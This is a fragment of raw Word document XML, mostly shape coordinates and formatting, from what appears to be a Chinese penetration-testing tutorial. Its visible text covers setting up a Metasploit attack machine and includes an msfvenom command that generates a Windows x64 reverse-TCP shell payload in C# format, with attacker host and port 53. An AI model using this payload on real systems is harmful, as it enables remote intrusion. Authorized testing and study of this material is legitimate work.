        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="342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配</w:t>
      </w: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置攻击机msf：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74.500pt;margin-top:437.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8750" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:8750;width:8990;height:690" coordorigin="1490,8750" coordsize="8990,690" path="m1510,8773l1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1511,8773,1512,8773,1512,8773,1514,8773,1515,8773,1517,8773,1519,8773,1521,8773,1524,8773,1528,8773,1532,8773,1536,8773,1541,8773,1546,8773,1552,8773,1559,8773,1566,8773,1575,8773,1583,8773,1593,8773,1603,8773,1615,8773,1627,8773,1640,8773,1654,8773,1668,8773,1684,8773,1701,8773,1719,8773,1738,8773,1758,8773,1780,8773,1802,8773,1826,8773,1851,8773,1877,8773,1904,8773,1933,8773,1963,8773,1995,8773,2028,8773,2063,8773,2099,8773,2136,8773,2175,8773,2216,8773,2259,8773,2303,8773,2348,8773,2396,8773,2445,8773,2496,8773,2549,8773,2604,8773,2660,8773,2719,8773,2779,8773,2841,8773,2906,8773,2972,8773,3041,8773,3112,8773,3184,8773,3259,8773,3336,8773,3416,8773,3498,8773,3582,8773,3668,8773,3757,8773,3848,8773,3941,8773,4037,8773,4136,8773,4236,8773,4340,8773,4446,8773,4555,8773,4666,8773,4780,8773,4897,8773,5017,8773,5139,8773,5264,8773,5392,8773,5523,8773,5657,8773,5793,8773,5933,8773,6076,8773,6222,8773,6370,8773,6522,8773,6677,8773,6835,8773,6997,8773,7161,8773,7329,8773,7500,8773,7675,8773,7853,8773,8034,8773,8219,8773,8407,8773,8598,8773,8793,8773,8992,8773,9194,8773,9400,8773,9609,8773,9823,8773,10039,8773,10260,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8775,10484,8775,10484,8775,10484,8775,10484,8776,10484,8776,10484,8777,10484,8777,10484,8778,10484,8778,10484,8779,10484,8780,10484,8780,10484,8781,10484,8782,10484,8783,10484,8784,10484,8785,10484,8787,10484,8788,10484,8789,10484,8791,10484,8792,10484,8794,10484,8795,10484,8797,10484,8799,10484,8801,10484,8803,10484,8805,10484,8808,10484,8810,10484,8812,10484,8815,10484,8818,10484,8821,10484,8824,10484,8827,10484,8830,10484,8833,10484,8837,10484,8840,10484,8844,10484,8848,10484,8852,10484,8856,10484,8860,10484,8864,10484,8869,10484,8874,10484,8878,10484,8883,10484,8889,10484,8894,10484,8899,10484,8905,10484,8911,10484,8917,10484,8923,10484,8929,10484,8936,10484,8942,10484,8949,10484,8956,10484,8964,10484,8971,10484,8979,10484,8986,10484,8994,10484,9003,10484,9011,10484,9020,10484,9028,10484,9037,10484,9047,10484,9056,10484,9066,10484,9075,10484,9085,10484,9096,10484,9106,10484,9117,10484,9128,10484,9139,10484,9151,10484,9162,10484,9174,10484,9186,10484,9199,10484,9211,10484,9224,10484,9237,10484,9251,10484,9264,10484,9278,10484,9292,10484,9307,10484,9322,10484,9336,10484,9352,10484,9367,10484,9383,10484,9399,10484,9415,10484,9432,10484,9449,10484,9449,10484,9449,10484,9449,10484,9449,10484,9449,10484,9449,10483,9449,10482,9449,10482,9449,10480,9449,10479,9449,10477,9449,10475,9449,10473,9449,10470,9449,10466,9449,10462,9449,10458,9449,10453,9449,10448,9449,10442,9449,10435,9449,10428,9449,10419,9449,10411,9449,10401,9449,10391,9449,10379,9449,10367,9449,10354,9449,10340,9449,10326,9449,10310,9449,10293,9449,10275,9449,10256,9449,10236,9449,10215,9449,10192,9449,10168,9449,10143,9449,10117,9449,10090,9449,10061,9449,10031,9449,9999,9449,9966,9449,9931,9449,9895,9449,9858,9449,9819,9449,9778,9449,9735,9449,9691,9449,9646,9449,9598,9449,9549,9449,9498,9449,9445,9449,9391,9449,9334,9449,9275,9449,9215,9449,9153,9449,9088,9449,9022,9449,8953,9449,8883,9449,8810,9449,8735,9449,8658,9449,8578,9449,8497,9449,8413,9449,8326,9449,8238,9449,8146,9449,8053,9449,7957,9449,7859,9449,7758,9449,7654,9449,7548,9449,7439,9449,7328,9449,7214,9449,7097,9449,6977,9449,6855,9449,6730,9449,6602,9449,6471,9449,6337,9449,6201,9449,6061,9449,5918,9449,5773,9449,5624,9449,5472,9449,5317,9449,5159,9449,4997,9449,4833,9449,4665,9449,4494,9449,4319,9449,4141,9449,3960,9449,3776,9449,3587,9449,3396,9449,3201,9449,3002,9449,2800,9449,2594,9449,2385,9449,2172,9449,1955,9449,1734,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9448,1510,9448,1510,9448,1510,9448,1510,9448,1510,9448,1510,9447,1510,9447,1510,9447,1510,9446,1510,9446,1510,9446,1510,9445,1510,9444,1510,9444,1510,9443,1510,9442,1510,9442,1510,9441,1510,9440,1510,9439,1510,9438,1510,9437,1510,9436,1510,9434,1510,9433,1510,9432,1510,9430,1510,9428,1510,9427,1510,9425,1510,9423,1510,9421,1510,9419,1510,9417,1510,9415,1510,9412,1510,9410,1510,9407,1510,9404,1510,9402,1510,9399,1510,9396,1510,9392,1510,9389,1510,9386,1510,9382,1510,9378,1510,9375,1510,9371,1510,9366,1510,9362,1510,9358,1510,9353,1510,9349,1510,9344,1510,9339,1510,9334,1510,9328,1510,9323,1510,9317,1510,9311,1510,9305,1510,9299,1510,9293,1510,9286,1510,9280,1510,9273,1510,9266,1510,9259,1510,9251,1510,9244,1510,9236,1510,9228,1510,9220,1510,9211,1510,9203,1510,9194,1510,9185,1510,9176,1510,9166,1510,9157,1510,9147,1510,9137,1510,9126,1510,9116,1510,9105,1510,9094,1510,9083,1510,9072,1510,9060,1510,9048,1510,9036,1510,9023,1510,9011,1510,8998,1510,8985,1510,8971,1510,8958,1510,8944,1510,8930,1510,8915,1510,8901,1510,8886,1510,8871,1510,8855,1510,8839,1510,8823,1510,8807,1510,8790,1510,8773e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:438.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8770" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:8770;width:8990;height:10" coordorigin="1490,8770" coordsize="8990,10" path="m1510,8781l1510,8781,1510,8781,1510,8781,1510,8781,1510,8781,1510,8781,1511,8781,1512,8781,1512,8781,1514,8781,1515,8781,1517,8781,1519,8781,1521,8781,1524,8781,1528,8781,1532,8781,1536,8781,1541,8781,1546,8781,1552,8781,1559,8781,1566,8781,1575,8781,1583,8781,1593,8781,1603,8781,1615,8781,1627,8781,1640,8781,1654,8781,1668,8781,1684,8781,1701,8781,1719,8781,1738,8781,1758,8781,1780,8781,1802,8781,1826,8781,1851,8781,1877,8781,1904,8781,1933,8781,1963,8781,1995,8781,2028,8781,2063,8781,2099,8781,2136,8781,2175,8781,2216,8781,2259,8781,2303,8781,2348,8781,2396,8781,2445,8781,2496,8781,2549,8781,2604,8781,2660,8781,2719,8781,2779,8781,2841,8781,2906,8781,2972,8781,3041,8781,3112,8781,3184,8781,3259,8781,3336,8781,3416,8781,3498,8781,3582,8781,3668,8781,3757,8781,3848,8781,3941,8781,4037,8781,4136,8781,4236,8781,4340,8781,4446,8781,4555,8781,4666,8781,4780,8781,4897,8781,5017,8781,5139,8781,5264,8781,5392,8781,5523,8781,5657,8781,5793,8781,5933,8781,6076,8781,6222,8781,6370,8781,6522,8781,6677,8781,6835,8781,6997,8781,7161,8781,7329,8781,7500,8781,7675,8781,7853,8781,8034,8781,8219,8781,8407,8781,8598,8781,8793,8781,8992,8781,9194,8781,9400,8781,9609,8781,9823,8781,10039,8781,10260,8781,10484,8781e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:471.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9430" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:9430;width:8990;height:10" coordorigin="1490,9430" coordsize="8990,10" path="m1510,9441l1510,9441,1510,9441,1510,9441,1510,9441,1510,9441,1510,9441,1511,9441,1512,9441,1512,9441,1514,9441,1515,9441,1517,9441,1519,9441,1521,9441,1524,9441,1528,9441,1532,9441,1536,9441,1541,9441,1546,9441,1552,9441,1559,9441,1566,9441,1575,9441,1583,9441,1593,9441,1603,9441,1615,9441,1627,9441,1640,9441,1654,9441,1668,9441,1684,9441,1701,9441,1719,9441,1738,9441,1758,9441,1780,9441,1802,9441,1826,9441,1851,9441,1877,9441,1904,9441,1933,9441,1963,9441,1995,9441,2028,9441,2063,9441,2099,9441,2136,9441,2175,9441,2216,9441,2259,9441,2303,9441,2348,9441,2396,9441,2445,9441,2496,9441,2549,9441,2604,9441,2660,9441,2719,9441,2779,9441,2841,9441,2906,9441,2972,9441,3041,9441,3112,9441,3184,9441,3259,9441,3336,9441,3416,9441,3498,9441,3582,9441,3668,9441,3757,9441,3848,9441,3941,9441,4037,9441,4136,9441,4236,9441,4340,9441,4446,9441,4555,9441,4666,9441,4780,9441,4897,9441,5017,9441,5139,9441,5264,9441,5392,9441,5523,9441,5657,9441,5793,9441,5933,9441,6076,9441,6222,9441,6370,9441,6522,9441,6677,9441,6835,9441,6997,9441,7161,9441,7329,9441,7500,9441,7675,9441,7853,9441,8034,9441,8219,9441,8407,9441,8598,9441,8793,9441,8992,9441,9194,9441,9400,9441,9609,9441,9823,9441,10039,9441,10260,9441,10484,9441e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:437.400pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:349.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13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98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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload生成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="158" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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msfvenom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‐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p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windows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x64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shell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reverse_tcp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LHOST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=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pacing w:val="7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.4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LPORT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=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53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‐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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f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404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>csharp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520.111pt;margin-top:550.502pt;width:0.0pt;height:291.497pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,11010" coordsize="0,5829">
        <v:shape style="position:absolute;left:10402;top:11010;width:0;height:5829" coordorigin="10402,11010" coordsize="0,5829" path="m10402,11010l10402,11010,10402,11010,10402,11010,10402,11010,10402,11010,10402,11010,10402,11010,10402,11011,10402,11011,10402,11012,10402,11013,10402,11014,10402,11016,10402,11017,10402,11019,10402,11021,10402,11024,10402,11027,10402,11030,10402,11033,10402,11037,10402,11042,10402,11046,10402,11052,10402,11057,10402,11064,10402,11070,10402,11078,10402,11085,10402,11094,10402,11103,10402,11113,10402,11123,10402,11134,10402,11146,10402,11158,10402,11171,10402,11185,10402,11199,10402,11215,10402,11231,10402,11248,10402,11266,10402,11285,10402,11304,10402,11325,10402,11346,10402,11369,10402,11392,10402,11417,10402,11442,10402,11468,10402,11496,10402,11525,10402,11554,10402,11585,10402,11617,10402,11650,10402,11685,10402,11720,10402,11757,10402,11795,10402,11834,10402,11875,10402,11916,10402,11960,10402,12004,10402,12050,10402,12097,10402,12146,10402,12196,10402,12248,10402,12301,10402,12355,10402,12411,10402,12469,10402,12528,10402,12589,10402,12651,10402,12715,10402,12781,10402,12848,10402,12917,10402,12988,10402,13060,10402,13134,10402,13210,10402,13288,10402,13367,10402,13448,10402,13532,10402,13617,10402,13703,10402,13792,10402,13883,10402,13976,10402,14070,10402,14167,10402,14266,10402,14366,10402,14469,10402,14574,10402,14681,10402,14790,10402,14901,10402,15014,10402,15130,10402,15248,10402,15368,10402,15490,10402,15614,10402,15741,10402,15870,10402,16001,10402,16135,10402,16271,10402,16410,10402,16550,10402,16694,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:549.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10990" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:10990;width:8990;height:410" coordorigin="1490,10990" coordsize="8990,410" path="m1510,11010l1510,11010,1510,11010,1510,11010,1510,11010,1510,11010,1510,11010,1511,11010,1512,11010,1512,11010,1514,11010,1515,11010,1517,11010,1519,11010,1521,11010,1524,11010,1528,11010,1532,11010,1536,11010,1541,11010,1546,11010,1552,11010,1559,11010,1566,11010,1575,11010,1583,11010,1593,11010,1603,11010,1615,11010,1627,11010,1640,11010,1654,11010,1668,11010,1684,11010,1701,11010,1719,11010,1738,11010,1758,11010,1780,11010,1802,11010,1826,11010,1851,11010,1877,11010,1904,11010,1933,11010,1963,11010,1995,11010,2028,11010,2063,11010,2099,11010,2136,11010,2175,11010,2216,11010,2259,11010,2303,11010,2348,11010,2396,11010,2445,11010,2496,11010,2549,11010,2604,11010,2660,11010,2719,11010,2779,11010,2841,11010,2906,11010,2972,11010,3041,11010,3112,11010,3184,11010,3259,11010,3336,11010,3416,11010,3498,11010,3582,11010,3668,11010,3757,11010,3848,11010,3941,11010,4037,11010,4136,11010,4236,11010,4340,11010,4446,11010,4555,11010,4666,11010,4780,11010,4897,11010,5017,11010,5139,11010,5264,11010,5392,11010,5523,11010,5657,11010,5793,11010,5933,11010,6076,11010,6222,11010,6370,11010,6522,11010,6677,11010,6835,11010,6997,11010,7161,11010,7329,11010,7500,11010,7675,11010,7853,11010,8034,11010,8219,11010,8407,11010,8598,11010,8793,11010,8992,11010,9194,11010,9400,11010,9609,11010,9823,11010,10039,11010,10260,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11010,10484,11011,10484,11011,10484,11011,10484,11011,10484,11012,10484,11012,10484,11012,10484,11013,10484,11013,10484,11014,10484,11014,10484,11015,10484,11015,10484,11016,10484,11016,10484,11017,10484,11018,10484,11019,10484,11019,10484,11020,10484,11021,10484,11022,10484,11023,10484,11024,10484,11026,10484,11027,10484,11028,10484,11029,10484,11031,10484,11032,10484,11034,10484,11035,10484,11037,10484,11038,10484,11040,10484,11042,10484,11044,10484,11046,10484,11048,10484,11050,10484,11052,10484,11055,10484,11057,10484,11060,10484,11062,10484,11065,10484,11067,10484,11070,10484,11073,10484,11076,10484,11079,10484,11082,10484,11086,10484,11089,10484,11092,10484,11096,10484,11100,10484,11103,10484,11107,10484,11111,10484,11115,10484,11119,10484,11124,10484,11128,10484,11133,10484,11137,10484,11142,10484,11147,10484,11152,10484,11157,10484,11162,10484,11167,10484,11173,10484,11178,10484,11184,10484,11190,10484,11196,10484,11202,10484,11208,10484,11214,10484,11221,10484,11227,10484,11234,10484,11241,10484,11248,10484,11255,10484,11263,10484,11270,10484,11278,10484,11285,10484,11293,10484,11301,10484,11309,10484,11318,10484,11326,10484,11335,10484,11344,10484,11353,10484,11362,10484,11371,10484,11380,10484,11390,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10483,11400,10482,11400,10482,11400,10480,11400,10479,11400,10477,11400,10475,11400,10473,11400,10470,11400,10466,11400,10462,11400,10458,11400,10453,11400,10448,11400,10442,11400,10435,11400,10428,11400,10419,11400,10411,11400,10401,11400,10391,11400,10379,11400,10367,11400,10354,11400,10340,11400,10326,11400,10310,11400,10293,11400,10275,11400,10256,11400,10236,11400,10215,11400,10192,11400,10168,11400,10143,11400,10117,11400,10090,11400,10061,11400,10031,11400,9999,11400,9966,11400,9931,11400,9895,11400,9858,11400,9819,11400,9778,11400,9735,11400,9691,11400,9646,11400,9598,11400,9549,11400,9498,11400,9445,11400,9391,11400,9334,11400,9275,11400,9215,11400,9153,11400,9088,11400,9022,11400,8953,11400,8883,11400,8810,11400,8735,11400,8658,11400,8578,11400,8497,11400,8413,11400,8326,11400,8238,11400,8146,11400,8053,11400,7957,11400,7859,11400,7758,11400,7654,11400,7548,11400,7439,11400,7328,11400,7214,11400,7097,11400,6977,11400,6855,11400,6730,11400,6602,11400,6471,11400,6337,11400,6201,11400,6061,11400,5918,11400,5773,11400,5624,11400,5472,11400,5317,11400,5159,11400,4997,11400,4833,11400,4665,11400,4494,11400,4319,11400,4141,11400,3960,11400,3776,11400,3587,11400,3396,11400,3201,11400,3002,11400,2800,11400,2594,11400,2385,11400,2172,11400,1955,11400,1734,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11399,1510,11399,1510,11399,1510,11399,1510,11399,1510,11399,1510,11399,1510,11398,1510,11398,1510,11398,1510,11398,1510,11397,1510,11397,1510,11397,1510,11396,1510,11396,1510,11395,1510,11395,1510,11394,1510,11393,1510,11393,1510,11392,1510,11391,1510,11391,1510,11390,1510,11389,1510,11388,1510,11387,1510,11386,1510,11385,1510,11384,1510,11383,1510,11381,1510,11380,1510,11379,1510,11377,1510,11376,1510,11374,1510,11373,1510,11371,1510,11369,1510,11367,1510,11365,1510,11363,1510,11361,1510,11359,1510,11357,1510,11355,1510,11352,1510,11350,1510,11347,1510,11345,1510,11342,1510,11339,1510,11336,1510,11333,1510,11330,1510,11327,1510,11324,1510,11320,1510,11317,1510,11313,1510,11310,1510,11306,1510,11302,1510,11298,1510,11294,1510,11290,1510,11286,1510,11281,1510,11277,1510,11272,1510,11267,1510,11263,1510,11258,1510,11252,1510,11247,1510,11242,1510,11237,1510,11231,1510,11225,1510,11219,1510,11213,1510,11207,1510,11201,1510,11195,1510,11188,1510,11182,1510,11175,1510,11168,1510,11161,1510,11154,1510,11147,1510,11139,1510,11132,1510,11124,1510,11116,1510,11108,1510,11100,1510,11092,1510,11083,1510,11074,1510,11066,1510,11057,1510,11048,1510,11038,1510,11029,1510,11019,1510,11010e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:549.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:569.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11390" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:11390;width:8990;height:630" coordorigin="1490,11390" coordsize="8990,630" path="m1510,11400l1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1510,11400,1511,11400,1512,11400,1512,11400,1514,11400,1515,11400,1517,11400,1519,11400,1521,11400,1524,11400,1528,11400,1532,11400,1536,11400,1541,11400,1546,11400,1552,11400,1559,11400,1566,11400,1575,11400,1583,11400,1593,11400,1603,11400,1615,11400,1627,11400,1640,11400,1654,11400,1668,11400,1684,11400,1701,11400,1719,11400,1738,11400,1758,11400,1780,11400,1802,11400,1826,11400,1851,11400,1877,11400,1904,11400,1933,11400,1963,11400,1995,11400,2028,11400,2063,11400,2099,11400,2136,11400,2175,11400,2216,11400,2259,11400,2303,11400,2348,11400,2396,11400,2445,11400,2496,11400,2549,11400,2604,11400,2660,11400,2719,11400,2779,11400,2841,11400,2906,11400,2972,11400,3041,11400,3112,11400,3184,11400,3259,11400,3336,11400,3416,11400,3498,11400,3582,11400,3668,11400,3757,11400,3848,11400,3941,11400,4037,11400,4136,11400,4236,11400,4340,11400,4446,11400,4555,11400,4666,11400,4780,11400,4897,11400,5017,11400,5139,11400,5264,11400,5392,11400,5523,11400,5657,11400,5793,11400,5933,11400,6076,11400,6222,11400,6370,11400,6522,11400,6677,11400,6835,11400,6997,11400,7161,11400,7329,11400,7500,11400,7675,11400,7853,11400,8034,11400,8219,11400,8407,11400,8598,11400,8793,11400,8992,11400,9194,11400,9400,11400,9609,11400,9823,11400,10039,11400,10260,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11400,10484,11401,10484,11401,10484,11401,10484,11401,10484,11402,10484,11402,10484,11402,10484,11403,10484,11403,10484,11404,10484,11404,10484,11405,10484,11406,10484,11406,10484,11407,10484,11408,10484,11409,10484,11410,10484,11411,10484,11412,10484,11413,10484,11414,10484,11416,10484,11417,10484,11419,10484,11420,10484,11422,10484,11424,10484,11426,10484,11427,10484,11429,10484,11432,10484,11434,10484,11436,10484,11439,10484,11441,10484,11444,10484,11447,10484,11449,10484,11452,10484,11455,10484,11459,10484,11462,10484,11465,10484,11469,10484,11473,10484,11477,10484,11481,10484,11485,10484,11489,10484,11493,10484,11498,10484,11502,10484,11507,10484,11512,10484,11517,10484,11523,10484,11528,10484,11534,10484,11539,10484,11545,10484,11551,10484,11558,10484,11564,10484,11571,10484,11577,10484,11584,10484,11591,10484,11599,10484,11606,10484,11614,10484,11621,10484,11629,10484,11638,10484,11646,10484,11655,10484,11663,10484,11672,10484,11682,10484,11691,10484,11701,10484,11710,10484,11720,10484,11731,10484,11741,10484,11752,10484,11763,10484,11774,10484,11785,10484,11797,10484,11808,10484,11820,10484,11833,10484,11845,10484,11858,10484,11871,10484,11884,10484,11898,10484,11911,10484,11925,10484,11939,10484,11954,10484,11969,10484,11984,10484,11999,10484,12014,10484,12030,10484,12030,10484,12030,10484,12030,10484,12030,10484,12030,10484,12030,10483,12030,10482,12030,10482,12030,10480,12030,10479,12030,10477,12030,10475,12030,10473,12030,10470,12030,10466,12030,10462,12030,10458,12030,10453,12030,10448,12030,10442,12030,10435,12030,10428,12030,10419,12030,10411,12030,10401,12030,10391,12030,10379,12030,10367,12030,10354,12030,10340,12030,10326,12030,10310,12030,10293,12030,10275,12030,10256,12030,10236,12030,10215,12030,10192,12030,10168,12030,10143,12030,10117,12030,10090,12030,10061,12030,10031,12030,9999,12030,9966,12030,9931,12030,9895,12030,9858,12030,9819,12030,9778,12030,9735,12030,9691,12030,9646,12030,9598,12030,9549,12030,9498,12030,9445,12030,9391,12030,9334,12030,9275,12030,9215,12030,9153,12030,9088,12030,9022,12030,8953,12030,8883,12030,8810,12030,8735,12030,8658,12030,8578,12030,8497,12030,8413,12030,8326,12030,8238,12030,8146,12030,8053,12030,7957,12030,7859,12030,7758,12030,7654,12030,7548,12030,7439,12030,7328,12030,7214,12030,7097,12030,6977,12030,6855,12030,6730,12030,6602,12030,6471,12030,6337,12030,6201,12030,6061,12030,5918,12030,5773,12030,5624,12030,5472,12030,5317,12030,5159,12030,4997,12030,4833,12030,4665,12030,4494,12030,4319,12030,4141,12030,3960,12030,3776,12030,3587,12030,3396,12030,3201,12030,3002,12030,2800,12030,2594,12030,2385,12030,2172,12030,1955,12030,1734,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12030,1510,12029,1510,12029,1510,12029,1510,12029,1510,12029,1510,12028,1510,12028,1510,12027,1510,12027,1510,12027,1510,12026,1510,12026,1510,12025,1510,12024,1510,12023,1510,12023,1510,12022,1510,12021,1510,12020,1510,12019,1510,12018,1510,12017,1510,12015,1510,12014,1510,12013,1510,12011,1510,12010,1510,12008,1510,12006,1510,12004,1510,12002,1510,12000,1510,11998,1510,11996,1510,11994,1510,11991,1510,11989,1510,11986,1510,11983,1510,11980,1510,11977,1510,11974,1510,11971,1510,11968,1510,11964,1510,11961,1510,11957,1510,11953,1510,11949,1510,11945,1510,11941,1510,11937,1510,11932,1510,11927,1510,11923,1510,11918,1510,11912,1510,11907,1510,11902,1510,11896,1510,11890,1510,11885,1510,11878,1510,11872,1510,11866,1510,11859,1510,11853,1510,11846,1510,11839,1510,11831,1510,11824,1510,11816,1510,11808,1510,11800,1510,11792,1510,11784,1510,11775,1510,11766,1510,11757,1510,11748,1510,11739,1510,11729,1510,11719,1510,11709,1510,11699,1510,11689,1510,11678,1510,11667,1510,11656,1510,11645,1510,11633,1510,11621,1510,11609,1510,11597,1510,11585,1510,11572,1510,11559,1510,11546,1510,11532,1510,11519,1510,11505,1510,11490,1510,11476,1510,11461,1510,11446,1510,11431,1510,11416,1510,11400e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:569.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11390" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:11390;width:30;height:630" coordorigin="1490,11390" coordsize="30,630" path="m1517,11400l1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11400,1517,11401,1517,11401,1517,11401,1517,11401,1517,11402,1517,11402,1517,11402,1517,11403,1517,11403,1517,11404,1517,11404,1517,11405,1517,11406,1517,11406,1517,11407,1517,11408,1517,11409,1517,11410,1517,11411,1517,11412,1517,11413,1517,11414,1517,11416,1517,11417,1517,11419,1517,11420,1517,11422,1517,11424,1517,11426,1517,11427,1517,11429,1517,11432,1517,11434,1517,11436,1517,11439,1517,11441,1517,11444,1517,11447,1517,11449,1517,11452,1517,11455,1517,11459,1517,11462,1517,11465,1517,11469,1517,11473,1517,11477,1517,11481,1517,11485,1517,11489,1517,11493,1517,11498,1517,11502,1517,11507,1517,11512,1517,11517,1517,11523,1517,11528,1517,11534,1517,11539,1517,11545,1517,11551,1517,11558,1517,11564,1517,11571,1517,11577,1517,11584,1517,11591,1517,11599,1517,11606,1517,11614,1517,11621,1517,11629,1517,11638,1517,11646,1517,11655,1517,11663,1517,11672,1517,11682,1517,11691,1517,11701,1517,11710,1517,11720,1517,11731,1517,11741,1517,11752,1517,11763,1517,11774,1517,11785,1517,11797,1517,11808,1517,11820,1517,11833,1517,11845,1517,11858,1517,11871,1517,11884,1517,11898,1517,11911,1517,11925,1517,11939,1517,11954,1517,11969,1517,11984,1517,11999,1517,12014,1517,12030e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:600.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12010" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:12010;width:8990;height:650" coordorigin="1490,12010" coordsize="8990,650" 